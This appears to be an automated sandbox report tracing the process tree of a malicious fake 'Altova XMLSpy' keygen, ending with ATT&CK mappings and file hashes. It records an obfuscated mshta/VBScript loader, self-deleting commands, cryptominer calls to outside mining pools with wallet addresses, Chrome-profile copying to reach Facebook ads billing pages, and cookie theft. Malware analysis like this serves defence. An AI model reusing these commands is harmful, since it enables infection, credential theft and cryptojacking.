                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,4011805123927707972,4988320594899967449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:4356
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                            1⤵
                                                                                                                              PID:1764
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                              1⤵
                                                                                                                                PID:1344
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:1296
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                1⤵
                                                                                                                                  PID:1136
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1096
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                    1⤵
                                                                                                                                      PID:932
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:1004
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:364
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:4248
                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:3180
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.key.code.generator.zip\Altova.Xmlspy.2011.Enterprise.key.code.generator.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.key.code.generator.zip\Altova.Xmlspy.2011.Enterprise.key.code.generator.exe"
                                                                                                                                          1⤵
                                                                                                                                            PID:4988
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                              2⤵
                                                                                                                                                PID:3180
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                  keygen-pr.exe -p83fsase3Ge
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4704
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4820
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5052
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                    keygen-step-1.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4772
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                    keygen-step-5.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4548
                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                      "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF """" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2716
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                          5⤵
                                                                                                                                                            PID:4348
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe
                                                                                                                                                              D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4172
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBSCRIPt: ClosE ( cREaTEOBJEcT ( "wsCRIPT.ShElL" ). RuN ( "C:\Windows\system32\cmd.exe /Q /c tYPe ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" > D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn& iF ""/pnPuKn3KQlE3bNFqBn"" == """" for %b IN ( ""C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe"" ) do taskkill -IM ""%~NXb"" /F > NUl " , 0 ) )
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:188
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /Q /c tYPe "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" >D6hhmJwqt.exe &&sTArt D6hhmJwqt.exe /pnPuKn3KQlE3bNFqBn&iF "/pnPuKn3KQlE3bNFqBn" == "" for %b IN ( "C:\Users\Admin\AppData\Local\Temp\D6hhmJwqt.exe" ) do taskkill -IM "%~NXb" /F > NUl
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:712
                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                    "C:\Windows\System32\regsvr32.exe" -u BZLY.W /s
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                    PID:4684
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill -IM "keygen-step-5.exe" /F
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:3696
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                            keygen-step-2.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                            PID:5112
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8A5A.tmp.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8A5A.tmp.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:4996
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\8A5A.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4692
                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:4136
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:4716
                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:1160
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                                keygen-step-3.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4724
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3340
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:4776
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                                  keygen-step-4.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4668
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\asdw.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:4740
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:2368
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                    PID:3164
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\9268.tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\9268.tmp.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:1712
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\9268.tmp.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\9268.tmp.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:360
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\95B5.tmp.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\95B5.tmp.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:4856
                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w2556 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                        PID:572
                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w20657@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:4460
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:3832
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping 127.0.0.1
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:4652
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                        PID:3940
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4384
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:1664
                                                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                            xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            PID:1424
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                            PID:4316
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffae3714f50,0x7ffae3714f60,0x7ffae3714f70
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:3864
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1652 /prefetch:8
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:4868
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1604 /prefetch:2
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4724
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2264 /prefetch:8
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4740
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:992
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4488
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4628
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5036
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:2364
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,8378236303271129024,4237313013176883754,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:2728
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md4_4igk.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            PID:4996
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:2084
                                                                                                                                                                                            • C:\ProgramData\1300857.exe
                                                                                                                                                                                              "C:\ProgramData\1300857.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:5016
                                                                                                                                                                                            • C:\ProgramData\5425852.exe
                                                                                                                                                                                              "C:\ProgramData\5425852.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              PID:836
                                                                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:4356
                                                                                                                                                                                            • C:\ProgramData\340536.exe
                                                                                                                                                                                              "C:\ProgramData\340536.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:3980
                                                                                                                                                                                              • C:\ProgramData\340536.exe
                                                                                                                                                                                                "{path}"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:3756
                                                                                                                                                                                            • C:\ProgramData\5892364.exe
                                                                                                                                                                                              "C:\ProgramData\5892364.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4676
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:2292
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:796
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4296
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:2288
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4456

                                                                                                                                                                                    Network

                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                    Persistence

                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                    1
                                                                                                                                                                                    T1060

                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                    2
                                                                                                                                                                                    T1112

                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                    1
                                                                                                                                                                                    T1130

                                                                                                                                                                                    Credential Access

                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                    4
                                                                                                                                                                                    T1081

                                                                                                                                                                                    Discovery

                                                                                                                                                                                    Query Registry

                                                                                                                                                                                    3
                                                                                                                                                                                    T1012

                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                    4
                                                                                                                                                                                    T1082

                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                    1
                                                                                                                                                                                    T1018

                                                                                                                                                                                    Collection

                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                    4
                                                                                                                                                                                    T1005

                                                                                                                                                                                    Command and Control

                                                                                                                                                                                    Web Service

                                                                                                                                                                                    1
                                                                                                                                                                                    T1102

                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                    Downloads

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                      MD5

                                                                                                                                                                                      a3aae61cb62b6f4594fe7e5593312186

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      7a8852eafcc04e7140121a3282a620065c1b2430

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      44e83b044915972faccbea0f0ff885e773bc4660163da0e640925b9e8cc39ba8

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      8b5962cf5a259f0314a6190ed0df749e49425dc9d5e4f2013cec64c37c497ddfea83e77b573ddea75fdaf8cd69f8f4ccfc07608893e5ef6ec5bf9c66e4a2afde

                                                                                                                                                                                    • \??\pipe\crashpad_5020_HEDYCLDYLWLRVHCS
                                                                                                                                                                                      MD5

                                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                    • \??\pipe\crashpad_796_FDJFQVALRZVZLDJJ
                                                                                                                                                                                      MD5

                                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                      SHA512

